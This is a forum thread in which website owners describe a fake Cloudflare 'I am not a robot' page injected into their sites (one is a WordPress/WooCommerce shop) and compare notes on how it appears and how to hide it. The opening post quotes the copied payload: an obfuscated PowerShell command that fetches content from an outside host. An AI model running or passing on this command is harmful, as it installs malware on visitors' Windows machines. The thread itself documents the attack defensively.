Website presented a cloudflare verification page. But when clicked the page says “Unusual web traffic detected” and provides steps to resolve this manually. The steps are to open Windows Run by pressing Win + R buttons and pasting the test they provide.
The text looks like this in the website → “Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 6RM-42B”
But when copied by the copy button next to it this is what it contains → “POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\S2\\\\\\mht*e https://black.hologramm.us/ # ‘‘Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 6RM-42B’’”
Was the site working with SSL prior to adding it to Cloudflare?
I’ve tried everything to remove this malware, or at least identify where it’s generated.
No server-side or local malware scanners have detected anything, and there doesn’t seem to be much information on the internet at this point.
For those who might find it useful, what I’ve done is create a small JavaScript that prevents this screen from popping up, so your users can access it normally.
The phishing script is injected via a Cloudflare Worker, at least in other sites that I have observed, so the attackers have somehow gotten access to your account.
My site didn’t have Cloudflare, and my hosting didn’t configure it for me either. The malware started about 10 days ago.
Sorry I didn’t paste the code. It’s simply to make the iframe it creates disappear, so users don’t see it and can browse. But it doesn’t delete it.
In my case, it’s a WordPress with WooCommerce, and it puts the code in the last div. I imagine it will also put it in your last div, whether it’s WordPress or not.
And just in case it gives any clues. In my case, if I was logged in to WordPress, then it didn’t appear.
And when I wasn’t logged in, it appeared randomly. For example, it didn’t appear with Linux or Ubuntu, but it did with Windows. Also, if I accessed it with a VPN or proxies, it appeared in some cases, but not in others. And as far as I could tell, I found no trace of it in my database or files, so I think it might be injecting a call to an external JavaScript.